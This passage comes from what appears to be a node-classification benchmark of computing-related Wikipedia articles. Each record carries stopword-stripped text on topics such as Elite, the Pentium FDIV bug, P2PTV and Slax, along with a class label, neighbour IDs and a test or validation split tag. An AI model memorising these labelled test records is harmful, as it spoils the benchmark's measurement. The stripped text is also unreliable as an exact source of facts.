acornsoft insisted smaller universe hide galaxies mathematical origins however use procedural generation created problems number poorly located systems reached galactic hyperspace— 7 light years nearest neighbour thus trapping traveller braben bell also checked none system names profane removing entire galaxy finding planet named arse developers spend much time playing creation quality testing mostly performed acornsoft director marketing david johnson-davies also planned packaging marketing campaign time original bbc micro disk version uses non-standard disk-format copy protection relied specific osword 7f dfs opcodes intel 8271 floppy-disk controller directly access disk produce non-standard sector/track-layout causes issues legitimate customers use western digital 1770 disk-controller dfs roms third-party manufacturers watford electronics acorn subsequently released alternative versions bbc disks compatible wd1770 addition self-modifying code used part protection system created rob northen bbc disk-copy-protection also used superior software exile game acornsoft set motion large-scale publicity campaign commissioned presentational package game far elaborate normal acornsoft packaged elite box larger usual releases complete novella robert holdstock called dark wheel 64-page space trader flight training manual reference card ship identification poster flight training manual written style took rookie trader controls various aspects play dark wheel first novella included distribution video game original acornsoft version promised back cover sequel novella planned publication 1985 direct sequel ever written second novella imprint andy redman included ibm pc release elite plus apart set universe way connected original story marketing activities included £50,000 promotional budget acornsoft including television advertising launch party thorpe park theme park holding event video game almost unheard time competition among first achieve status elite story tells young starship pilot named alex ryder whose father jason killed merchant ship attacked notorious pirate trying understand avenge father death achieve iron ass space-trader term well armed- armoured spaceship alex encounters basics elite universe—including combat hyperdrive hyperspace deadly aliens called thargoids finally alex discovers truth father combat rank also acts acceptable face trading due female co-pilot elyssia fields alien species wanted several systems alex wants avenge father death must exercise caution tracking assassin trading commodities slowly improves arms armour ship competent using spaceship combat feels ready makes trade sure bring father killer alex also learns dark wheel takes join ranks first version game released bbc micro model b tape disk month two later acorn electron tape version released electron limitations meant several game features cut including thargoids suns neither bbc electron tape versions featured missions additionally original tape version electron contained bug stopped galactic hyperspace working acorn provided mail-in tape-replacement service upgrade v1.1 marked tape label fixed bug bbc b disk version referred classic elite would load new set ships every hyperspace jump space station launch meaning larger number ships available new disk version released superior software 1986 enhanced take advantage bbc micro model b successors including bbc micro model b+ master 128 computers optional 6502 second processor sideways ram fitted case game used modes 1 2 make colours available great commercial success bbc micro version prompted bidding war rights publish elite formats british telecom software arm telecomsoft eventually eventually ported virtually every contemporary home computer system including amiga atari st apple ii amstrad cpc commodore 64 zx spectrum msx tatung einstein ibm pc compatible console version released 1991 nintendo entertainment system nes version released exclusively europe according developers n't released north america could find publisher game north america versions slightly altered gameplay characteristics number missions offered player contemporary versions home computers based 6502 microprocessor ported either bell bell braben commodore 64 conversion introduced trumbles creatures based tribbles docking computer activated commodore 64 version versions musical rendition blue danube waltz played nod space docking sequence stanley kubrick 1968 film music arranged david dunn zx spectrum version programmed torus included supernova mission found version amstrad cpc conversion port zx version fewer ships platforms lacking anaconda transport along minor differences missions titles according lead programmer 16 bit amiga/atari st msx conversions rob nicholson access source code contractual issues write blind ship shapes procedural generation code galaxies elite plus released dos 1991 whereas original elite 1987 pc used cga graphics elite plus upgraded take advantage ega vga mcga coded entirely assembly language chris sawyer later wrote rollercoaster tycoon elite plus ninth galaxy reached hyperspacing witch space elite plus published microplay software acorn archimedes version arcelite 1991 written warren burch clive gringras regarded stuff magazine best conversion original game added intelligent opponents engage private battles police take active interest protecting law well gameplay enhancements version also exploited modern hardware using polygon mesh graphics place wire-frames game world longer seems centred around player freighter fleets escorts go business pirate formations patrol lawless systems looking cargo loot mining ships often found breaking asteroids mineral content unlike mythical generation ships original rare occurrences non-pirate entities mentioned manual really found archimedes version geometric formations space beacons hermits living among asteroids abandoned ships towed police although dredgers generation ships confirmed exist archimedes elite archimedes version elite originally written space trading game called trojan however obvious similarities eventually meant avoid potential lawsuit trojan become official elite conversion arcelite one number games released free icon bar website 2006 versions feature new title archangel player earn substitutes rank commander archangel reached undertaking special mission destroy space station system invaded thargoids player reward completing mission receive title archangel obtain device capable emulating anti-ecm broadcast elite received positive reviews launch bbc micro version eventually sold 107,898 copies game popularity became national phenomenon uk reports airing channel 4 elsewhere elite firebird best-selling commodore game late 1987 bell estimates approximately 600,000 copies eventually sold platforms combined frontier developments elite page states numbers around million units elite technical breakthroughs reportedly amazed bbc micro developers sophie wilson calling game could n't written many players found gameplay difficult unfamiliar however game controversial micro user devoted april 1985 letter column readers debating review game beebug magazine 1984 david fell called elite best game ever bbc micro personal computer games shingo sugiura said elite vast complex absorbing 've got bulging red eyeballs staying early hours n't care 'm going continue playing ranked elite ... least competent ... even average ... buy john cook wrote december 1984 issue micro adventurer masterpiece difficult describe within existing parameters standards elite excellent game certainly top three year bbc standards simply best game ever written machine crash magazine said spectrum version elite one imaginative ever designed run home computer gave score 92 time best-seller gallup charts game number 16 sinclair top 100 speccy games 1992 voted number 7 sinclair readers top 100 games time 1993 voted 9th best game time readers retro gamer magazine article scheduled special sinclair tribute issue similarly zzap 64 gave commodore 64 version 97 stating brilliant game blasting trading certainly best game 've seen year 1985 amiga version 98 1989 1984 elite received golden joystick award best original game 1985 game awarded best game overall year readers crash magazine elite ranked 14 top game time next generation 1996 12 ign 2000 top 25 pc games time list 3 influential video game ever times online 2007 6 greatest game stuff magazine 2008 1 top retro game retro gamer 2004 1 best game 1980s next generation 2008 game retrospectively awarded 10/10 multi-format magazine edge —together 2 games— exhibited places london science museum game exhibition organised toured barbican art gallery elite also featured game pong oblivion 50 greatest video games time authors simon byron ste curran david mccarthy 1991 pc format placed elite plus list 50 best computer games time editors called classic game mixes solid 3d space combat trading create universe spend many happy half-hour bushwhacking dastardly thargoids elite often regarded yardstick subsequent space trading games measured since release elite credited title defined modern space flight simulation genre significant source inspiration later games genre well influential upon gaming whole interviews senior producers ccp games cited elite one inspirations acclaimed mmorpg eve online developers jumpgate evolution battlecruiser 3000ad infinity quest earth hard truck apocalyptic wars flatspace likewise credited elite source inspiration similar praise bestowed elsewhere media years named one influential games history credited first truly open-ended open world game opening door future online persistent worlds second life world warcraft eve online elite one popularly requested games remade arguing still best example genre date recent titles—including immediate sequel—not rising level november 1999 game 15th birthday ian bell released many binaries source code several versions original game website dispute arose bell david braben regarding bell decision make available versions original elite dispute since ended various versions became available bell site late 1980s variant commercial bbc micro elite release created angus duggan disassembling modifying 6502 code existing many extra features originally titled elite iii known elite minimise confusion includes many ship types ship types flyable player begins less capable adder cargo delivery missions extra equipment items numerous gameplay improvements elite released publicly 1997 like original game downloaded free ian bell web site played emulation many attempts develop clones elite made abandoned completion otherwise failed come fruition open source oolite notable exception another successful adaptation 1337 meaning elite leetspeak developed jose maria enguita oric machines 2010 oldschool gaming game year award contrasting conversions around 1999 christian pinder developed elite new kind modern pc port original bbc micro version achieved faithful port reverse-engineering original assembly written bbc micro version recreating platform neutral c code variant david braben request version withdrawn distribution 2003 september 2014 elite 30th birthday ian bell blessed elite new kind re-released free website since elite new kind also distributed version 1.1 christian pinder source code mirror hosted github 20 october 2013 internet archive started offer elite zx spectrum version online playing browser via mess emulation three official sequels created 1993 elite iii 1995 produced braben company frontier developments third sequel elite dangerous conceived 1998 provisionally titled elite 4 successfully crowdfunded initially kickstarter campaign late 2012 released december 2014 bell limited involvement first sequel involved production second frontier games considerable advance original elite filled 3d graphics missions complex economy time player confined orbit could land explore mine planets number flyable ships greatly increased new political backstory introduced enabling player gain ranks competing interstellar empires frontier elite ii appeared commodore amiga atari st ibm pc whilst frontier first encounters released ibm pc two frontier games significantly flawed number respects games many bugs first encounters particular due apparently published incomplete state first encounters extensively patched reissued finally withdrawn sale followed lawsuit brought gametek david braben two games employed realistic flight model based newtonian mechanics rather original arcade-style engine realistic many players also found frustratingly difficult particularly combat space trading games since elite stuck arcade-style flight model ships behave though flying atmosphere elite dangerous added multiplayer extended use procedural generation allowing players fly survey every non-atmospheric planet every size galaxy containing billions stars elite dangerous also offers newtonian flight model well arcade one player able choose using 'flight assist",
    "neighbors": [
      477,
      9006,
      10173,
      7536,
      6129,
      7281,
      3091,
      372,
      8304,
      10862,
      8407,
      10931,
      7421,
      3002,
      11221,
      5820,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8831,
    "label": 2,
    "text": "ISIS_(operating_system):isis operating system isis short intel system implementation supervisor operating system early intel microprocessors like 8080 originally developed ken burgett new management bill davidow intel microprocessor development system starting 1975 later adopted isis-ii systems floppy drives communication user terminal-like user interface somewhat cp/m-like even program interface point view file opening program sends name file gets back handle device name entered pair colons codice_1 codice_2 floppies codice_3 printer etc. diskette one directory subdirectories isis-ii distributed part intel microprocessor development system includes standard operating system commands copy delete dir rename format debugging software assembler linker debugger external debugging developed device two editors one aedit contains editing macros support file editing provided directly diskette .bak file always created editor credit isis-ii needed least 32 kilobytes ram 8080/8085 cpu maximum address space 64 kilobytes mds-800 series-ii monitor occupied f800h ffffh floppy disk format 8-inch single-sided 250 kb single-sided single-density fm 500 kb single-sided double-density mmfm isis-pds also software media incompatible unique came 720 kb dsdd 5¼-inch floppies intel personal development system ipds-100 isis-iv operating system another incompatible even intel development systems ran imdx-430 series-iv network development system-ii intel asm80 plm-80 basic-80 cobol-80 fortran-80 available isis-ii asm86 asm48 asm51 available well following list commands supported isis-ii console",
    "neighbors": [
      10561,
      2179,
      4548,
      8262,
      8729,
      7188,
      1750,
      4409,
      477,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 8832,
    "label": 2,
    "text": "TurboPrint:turboprint turboprint closed source printer driver system linux amigaos morphos supports number printers n't yet free driver fuller printer functionality printer models recent versions integrates cups printing system",
    "neighbors": [
      9249,
      9762,
      4387,
      3974,
      7626,
      10570,
      5743,
      7983,
      8369,
      8114,
      6995,
      8115,
      2197,
      9236,
      823,
      9848
    ],
    "mask": "Test"
  },
  {
    "node_id": 8833,
    "label": 7,
    "text": "P2PTV:p2ptv p2ptv refers peer-to-peer p2p software applications designed redistribute video streams real time p2p network distributed video streams typically tv channels world may also come sources draw applications significant potential make tv channel globally available individual feeding stream network peer joining watch video relay peer viewers allowing scalable distribution among large audience incremental cost source p2ptv system user downloading video stream simultaneously also uploading stream users thus contributing overall available bandwidth arriving streams typically minutes time-delayed compared original sources video quality channels usually depends many users watching video quality better users architecture many p2ptv networks thought real-time versions bittorrent user wishes view certain channel p2ptv software contacts tracker server channel order obtain addresses peers distribute channel contacts peers receive feed tracker records user address given users wish view channel effect creates overlay network top regular internet distribution real-time video content need tracker also eliminated use distributed hash table technology applications allow users broadcast streams whether self-produced obtained video file tv tuner card video capture card lots commercial p2ptv applications developed china tvuplayer pplive qqlive ppstream majority available applications broadcast mainly asian tv stations exception tvuplayer carries number north american stations including cbs spike tv fox news applications distribute tv channels without legal license utilization p2p technology particularly popular view channels either available locally available paid subscription case sports channels distributing links pirated p2ptv feeds u.s.-based web site result u.s. government seizing web site several p2ptv aggregation sites prior super bowl xlv january 2009 14,000 p2p channels ppstream commercial p2ptv applications outside china abroadcasting usa zattoo switzerland/usa octoshape denmark livestation uk",
    "neighbors": [
      8640,
      10368,
      6435,
      3428,
      8170,
      945,
      7921,
      467,
      4120,
      4219,
      10270
    ],
    "mask": "None"
  },
  {
    "node_id": 8834,
    "label": 3,
    "text": "Pentium_FDIV_bug:pentium fdiv bug pentium fdiv bug computer bug affecting floating point unit fpu early intel pentium processors bug processor might return incorrect binary floating point results dividing number bug discovered 1994 professor thomas r. nicely lynchburg college intel attributed error missing entries lookup table used floating-point division circuitry severity fdiv bug debated though rarely encountered users byte magazine estimated 1 9 billion floating point divides random parameters would produce inaccurate results flaw intel initial handling matter heavily criticized tech community december 1994 intel recalled defective processors january 1995 intel announced pre-tax charge 475 million earnings ostensibly total cost associated replacement flawed processors sweeney robertson tocher srt division algorithm used affected pentium chips implemented programmable logic array 2,048 cells 1,066 cells populated one five values buggy chips five cells contained value +2 missing instead returning 0 thomas nicely professor mathematics lynchburg college written code enumerate primes twin primes prime triplets prime quadruplets nicely noticed inconsistencies calculations june 13 1994 shortly adding pentium system group computers unable eliminate factors programming errors motherboard chipsets etc october 19 1994 october 24 1994 reported issue intel according nicely contact person intel later admitted intel aware problem since may 1994 flaw discovered tom kraljevic purdue university co-op student working intel hillsboro oregon testing fpu new p6 core first used pentium pro october 30 1994 nicely sent email describing error discovered pentium floating point unit various contacts requesting reports testing flaw 486-dx4s pentiums pentium clones flaw pentium fpu quickly verified people around internet became known pentium fdiv bug fdiv x86 assembly language mnemonic floating-point division one example found division result returned pentium 61 parts per million story first appeared press november 7 1994 article electronic engineering times intel fixes pentium fpu glitch alexander wolfe story subsequently picked cnn segment aired november 21 1994 brought widespread public prominence publicly intel acknowledged floating-point flaw claimed serious would affect users intel offered replace processors users could prove affected however although independent estimates found bug little importance would negligible effect users caused great public outcry companies like ibm whose ibm 5x86c microprocessor competed time intel pentium line joined condemnation december 20 1994 intel offered replace flawed pentium processors basis request response mounting public pressure although turned small fraction pentium owners bothered get chips replaced financial impact company significant january 17 1995 intel announced pre-tax charge 475 million earnings ostensibly total cost associated replacement flawed processors defective chips later turned key rings intel 1995 article science describes value number theory problems discovering computer bugs gives mathematical background history brun constant problem nicely working discovered bug problem occurs models original pentium processor bug existed pentium family processors clock speed less 120 mhz affected models intel processor frequency id utility checks presence bug ten affected processors listed 39 s-specs processors listed intel processor specification finder web page intel 80486 overdrive pentium overdrive models also known exhibit fdiv bug well f00f bug presence bug checked manually performing following calculation application uses native floating point numbers including windows calculator microsoft excel windows 95/98 correct value converted hexadecimal value used processor 4,195,835 0x4005fb 3,145,727 0x2fffff 5 0x4005fb triggers fault fpu control logic result value returned flawed pentium processor certain situations incorrect beyond four digits users check processor issue using device manager device manager users expand system devices locate click numeric data processor click properties button new properties window appears click settings tab. br processor fdiv issue following message seen computer numeric data processor passed diagnostic tests appears working properly otherwise following message shall appear numeric processor computer sometimes compute inaccurate results dividing large numbers options provided bottom settings tab always use use passes diagnostics never use users run codice_1 command included windows nt 3.51 nt 4.0 2000 xp server 2003 computer needs restarted changes take effect codice_1 utility deprecated included current versions windows command-syntax nowiki pentnt -c -f -o /nowiki",
    "neighbors": [
      641,
      3970,
      10631,
      2568,
      6281,
      6797,
      8590,
      3856,
      6674,
      8851,
      4248,
      8729,
      4001,
      7847,
      808,
      7983,
      7088,
      10033,
      3250,
      1461,
      7356,
      5437,
      10428,
      960,
      8517,
      11083,
      1741,
      4174,
      1750,
      9946,
      10727,
      4074,
      1515,
      6506,
      1647,
      7151,
      2545,
      7281,
      11249,
      8692,
      3317,
      1915,
      6396
    ],
    "mask": "None"
  },
  {
    "node_id": 8835,
    "label": 1,
    "text": "SQL_Server_Agent:sql server agent sql server agent component microsoft sql server schedules jobs handles automated tasks runs windows service start automatically system boots started manually typical system tasks performed include scheduling maintenance plans backups handling reporting services subscriptions performing log shipping sub-tasks backup copy restore check user tasks scheduling t-sql command line statement also common sqlagent support operators alerts administrators notified e.g email",
    "neighbors": [
      11571,
      2811,
      1366,
      11030
    ],
    "mask": "None"
  },
  {
    "node_id": 8836,
    "label": 4,
    "text": "Closing_the_loop:closing loop closing loop company offers closed loop service mobile phones dutch social enterprise based amsterdam netherlands founded aim reduce electronic waste e-waste offering users sellers phones way make device material-neutral waste free company pays people emerging markets collect scrap phones phones recycled behalf closing loop ’ customers proposition works one one basis customer ’ phone ‘ offset ’ recycling broken phone known customers t-mobile kpmg city utrecht rabobank dutch national government closing loop buys collects 'end-of-life scrap phones african countries known places many used phones europe us get second life waste closing loop collects recycled europe way closing loop turns scrap phones valuable resources income people developing countries goal prevent mobile phones ending dump sites create sustainable telecom industry time closing loop saved 2.2 million mobile phones dump africa gave 145,000 mobile phones second life mobile phones bought informal local collector networks date closing loop helped 2,000 people africa earn additional income safe employment social enterprise sees e-waste opportunity opportunity source companies responsibly sourced metals make industries like telecom circular closing loops create income people emerging markets aims contribute circular economy sustainable development goals closing loop founded 2012 joost de kluijver joost started ngo make electronic industry aware impact e-waste although recognised e-waste major problem industry clearly needed awareness topic e-waste joost team therefore took initiative showed metals inside broken mobile phones still value contain gold silver copper recyclable metals closing loop set network collectors african countries 2015 first container filled mobile phones shipped ghana europe proper recycling end lifespan scrap mobile phones often dumped become hazard environment human health example landfills like agbogbloshie e-waste dumped people try make living burning electronics extract metals fumes released toxic",
    "neighbors": [
      3009,
      7579
    ],
    "mask": "None"
  },
  {
    "node_id": 8837,
    "label": 2,
    "text": "Slax:slax slax livecd linux distribution based debian developed tomáš matějíček packages added apt package manager prepared modules tagline slax refers pocket operating system one main benefits slax distribution ease customization additional software added removed using slax modules traditional package manager debian apt required load additional software slax modules completely self-contained however apt fully supported users also modify default cd image usb drive installation customize packages available distribution boot slax also allows debian packages converted slax modules slax modules compressed read-only squashfs file system images compressed lzma compressor various modules stacked together build complete slax root directory supplemental writable layer tmpfs file system put top stack implement write functionality stackable file system choice changed slax versions 5 unionfs 6 aufs module file name extension changed .mo .sb slax releases slax 3 known slackware-live latest version slax 9.9.1 five editions slax 5 fluxbox window manager option editions except frodo slax 6 offered single version completely relies modules additional packages extra features version 6 modules based lzma compression compatibility initially provided obsolete .mo modules used slax version 5 recent .lzm modules version 6 changes linux kernel versions sub-version releases slax 6 however .mo modules slax 5 considered obsolete module package compiled compatibility linux kernel currently use slax version 7 announced developer blog integrated newly refreshed slax website slax 7 supports 64-bit 32-bit architectures according download page available 50 languages also features stripped version kde 4 new wallpaper new module system november 2017 developer announced release version 9 latest edition heavily rewritten based debian relies apt add packages default builds 32-bit 64-bit contain fluxbox window manager terminal chromium web browser leafpad text editor calculator pcmanfm file manager wicd network manager",
    "neighbors": [
      4611,
      3079,
      2064,
      3089,
      4113,
      8209,
      8214,
      8727,
      4637,
      543,
      11297,
      9762,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      1632,
      4192,
      3685,
      10341,
      10860,
      5742,
      2671,
      11388,
      2692,
      9353,
      6797,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      7840,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      9909,
      4790,
      2230,
      4279,
      10425,
      4797,
      2239,
      9407,
      7364,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      6371,
      7907,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9972,
      9461,
      1782,
      5369,
      6393,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      10022,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      5959,
      2375,
      2887,
      9048,
      2397,
      8033,
      2914,
      5990,
      9064,
      7020,
      7022,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      2996,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 8838,
    "label": 4,
    "text": "Risk-based_authentication:risk-based authentication authentication risk-based authentication non-static authentication system takes account profile agent requesting access system determine risk profile associated transaction risk profile used determine complexity challenge higher risk profiles leads stronger challenges whereas static username/password may suffice lower-risk profiles risk-based implementation allows application challenge user additional credentials risk level appropriate",
    "neighbors": [
      1792,
      5573,
      9958,
      4912,
      210,
      8210,
      10580,
      5433,
      7260,
      10845
    ],
    "mask": "Test"
  },
  {
    "node_id": 8839,
    "label": 4,
    "text": "Levels_of_identity_security:levels identity security security features governing security identity divided three levels security i.e level 1 security l1s overt level 2 security l2s covert level 3 security l3s forensic three levels security combination provide comprehensive security coverage identities related documents ensure validity authenticity typically used protect identity information crucial documents identity cards driving licenses passports ensure originality accuracy identities represent diagram illustrates different levels security ensure complete security coverage identity",
    "neighbors": [
      10976,
      5433,
      9745,
      10163,
      4313,
      10207
    ],
    "mask": "None"
  },
  {
    "node_id": 8840,
    "label": 3,
    "text": "Jewels_of_Darkness:jewels darkness jewels darkness formerly middle-earth trilogy trilogy text adventure games level 9 individual games initially released separately 1983 featured themes inspired books j. r. r. tolkien became known middle-earth trilogy 1986 three games revised expanded rereleased together compilation legal reasons references middle-earth removed trilogy retitled jewels darkness games featured simple static graphics expanded version original adventure crowther woods similar structure previous game player must defeat dark lord continuation previous game following defeat dark lord player must explore tower looking treasure computer gaming world stated compilation claim games significantly revised incorporate latest innovative techniques false described puzzles illogical commodore version graphics crude like parser standard previous firebird text adventures graphics colourful 're great works art location descriptions scenarios always struck good enough br zzap issue sept. 1986",
    "neighbors": [
      9006,
      10931,
      9166,
      8646
    ],
    "mask": "Test"
  },
  {
    "node_id": 8841,
    "label": 2,
    "text": "Windows_Mobility_Center:windows mobility center windows mobility center component microsoft windows introduced windows vista centralizes information settings relevant mobile computing mobility center displayed device settings pertinent mobile devices first shown windows hardware engineering conference 2004 based activity center user interface design originated microsoft abandoned windows neptune project slated inclusion windows vista known codename longhorn windows mobility center user interface consists square tiles contain information settings related component audio settings battery life power schemes display brightness wireless network strength status tiles appear within interface depend hardware system device drivers windows mobility center located windows control panel also launched pressing keys windows vista 7 default wmc inaccessible desktop computers limitation bypassed one modifies windows registry windows mobility center extensible original equipment manufacturers customize interface additional tiles company branding though supported microsoft possible individual developers create tiles interface well",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      9173,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 8842,
    "label": 3,
    "text": "Apple_A8X:apple a8x apple a8x 64-bit arm-based system chip soc designed apple inc. manufactured tsmc first appeared ipad air 2 announced october 16 2014 variant a8 inside iphone 6 family smartphones apple states 40 cpu performance 2.5 times graphics performance predecessor apple a7 a8x three cores clocked 1.5 ghz powerful gpu compared a8 contains 3 billion transistors extra 100 mhz additional core a8x performs around 13 better single threaded 55 better multithreaded operations a8 inside iphone 6 iphone 6 plus comparison a8 shows a8x uses metal heat spreader a8 n't use package package configuration included ram a8 similar older x variants a5x a6x designed instead a8x ipad air 2 uses external 2 gb ram module first apple a8x reported semi-custom gpu a8x uses 8-cluster gpu based imagination technologies powervr series 6xt architecture officially largest implementation rogue 6-cluster design indicating apple made customizations design order provide higher performance gpu referred gxa6850 denoting apple customization a8x branch predictor claimed infringe 1998 patent october 14 2015 district judge found apple guilty infringing u.s. patent table based data speculation circuit parallel processing computer apple a7 a8 processors patent owned wisconsin alumni research foundation warf firm affiliated university wisconsin july 24 2017 apple ordered pay warf 506 million patent infringement apple filed appellate brief october 26 2017 u.s. court appeals federal circuit argued apple infringe patent owned wisconsin alumni research foundation september 28 2018 ruling overturned appeal award thrown u.s. federal circuit court appeals patent expired december 2016",
    "neighbors": [
      9732,
      1549,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      8231,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      9784,
      8250,
      1083,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      99,
      8806,
      3691,
      8812,
      6258,
      10357,
      6264,
      10361,
      4220,
      10365,
      2686,
      638,
      6783,
      7806,
      10878,
      644,
      4741,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      5784,
      7833,
      666,
      4251,
      5786,
      4258,
      7842,
      7844,
      4773,
      171,
      2735,
      3248,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      4888,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      11257,
      9022,
      1346,
      8003,
      10562,
      6981,
      838,
      5963,
      8525,
      1871,
      1872,
      2383,
      9042,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      9063,
      10602,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      1428,
      3483,
      4508,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      9182,
      4068,
      5093,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 8843,
    "label": 0,
    "text": "Word-sense_induction:word-sense induction computational linguistics word-sense induction wsi discrimination open problem natural language processing concerns automatic identification senses word i.e meanings given output word-sense induction set senses target word sense inventory task strictly related word-sense disambiguation wsd relies predefined sense inventory aims solve ambiguity words context output word-sense induction algorithm clustering contexts target word occurs clustering words related target word three main methods proposed literature underlying hypothesis approach words semantically similar appear similar documents similar context windows similar syntactic contexts occurrence target word corpus represented context vector context vectors either first-order vectors directly represent context hand second-order vectors i.e. contexts target word similar words tend co-occur together vectors clustered groups identifying sense target word well-known approach context clustering context-group discrimination algorithm based large matrix computation methods word clustering different approach induction word senses consists clustering words semantically similar thus bear specific meaning lin ’ algorithm prototypical example word clustering based syntactic dependency statistics occur corpus produce sets words discovered sense target word clustering committee cbc also uses syntactic contexts exploits similarity matrix encode similarities words relies notion committees output different senses word interest approaches hard obtain large scale many domain languages main hypothesis co-occurrence graphs assumes semantics word represented means co-occurrence graph whose vertices co-occurrences edges co-occurrence relations approaches related word clustering methods co-occurrences words obtained basis grammatical collocational relations hyperlex successful approaches graph algorithm based identification hubs co-occurrence graphs cope need tune large number parameters deal issue several graph-based algorithms proposed based simple graph patterns namely curvature clustering squares triangles diamonds squat++ balanced maximum spanning tree clustering b-mst patterns aim identifying meanings using local structural properties co-occurrence graph randomized algorithm partitions graph vertices iteratively transferring mainstream message i.e word sense neighboring vertices chinese whispers applying co-occurrence graphs approaches shown achieve state-of-the-art performance standard evaluation tasks",
    "neighbors": [
      416,
      1890,
      6274,
      7780,
      396,
      4468,
      5781,
      538
    ],
    "mask": "Test"
  },
  {
    "node_id": 8844,
    "label": 1,
    "text": "OpenBase:openbase openbase sql relational database server software originally developed openstep platform first released 1991 openbase available today several platforms although bulk users mac os x system supports common access methods via jdbc c however optimized use conjunction variety macintosh-based development tools like webobjects realbasic omnis studio",
    "neighbors": [
      9286,
      7307,
      10413,
      10389,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8845,
    "label": 5,
    "text": "GNTP:gntp genealogy network transfer protocol gntp unfinished protocol peer-to-peer genealogy network completed resource constraints idea allow genealogists share gedcom files much way music files distributed peer-to-peer networks",
    "neighbors": [
      1960,
      467,
      5787,
      8640
    ],
    "mask": "None"
  },
  {
    "node_id": 8846,
    "label": 8,
    "text": "Jinja_(template_engine):jinja template engine jinja web template engine python programming language licensed bsd license created armin ronacher similar django template engine provides python-like expressions ensuring templates evaluated sandbox text-based template language thus used generate markup well sourcecode jinja template engine allows customization tags filters tests globals also unlike django template engine jinja allows template designer call functions arguments objects jinja flask default template engine also used ansible features jinja jinja like smarty also ships easy-to-use filter system similar unix pipeline small example template file example.html.jinja templating code produces html string",
    "neighbors": [
      4198,
      9320,
      7658,
      8554,
      4972,
      9738,
      10510,
      8499,
      5492,
      11221
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8847,
    "label": 2,
    "text": "U3_(software):u3 software u3 joint venture sandisk m-systems producing proprietary method launching windows software special usb flash drives flash drives adhering u3 specification termed u3 smart drives u3 smart drives come preinstalled u3 launchpad looks similar windows os start menu controls program installation applications comply u3 specifications allowed write files registry information host computer must remove information flash drive ejected customizations settings instead stored application flash drive microsoft sandisk created successor called startkey sandisk began phasing support u3 technology late 2009 u3 flash drive presents host system usb hub cd drive standard usb mass storage device attached u3 launchpad launchu3.exe windows program manager preinstalled every u3 smart drive u3 launchpad automatically starts insertion u3 enabled device fully u3 compliant application programmed clean data local machine must also packaged u3 special program format u3 applications run u3 device u3 programs downloaded u3 website places applications include opera skype need installed computer u3 application programming interfaces apis allow u3 programs lower-level access usb flash drive query drive letter u3 apis primarily allow developers choose use power u3 control application handles things like device removal saves data back drive configuration documents latest version u3 launchpad supports windows 2000 service pack 4 windows xp windows vista windows 7 windows 8 data accessed using os capable reading usb mass storage devices unless u3 device password-protected early versions u3 launchpad software vista compatibility issues specifically sandisk cruzer titanium series device numbers 2.17 2.18 2.19 2.20 although problem could eliminated updating launcher software prior sandisk updated launcher software released microsoft supported u3 releasing update vista information building u3 compliant applications u3 software development kit available registered developers 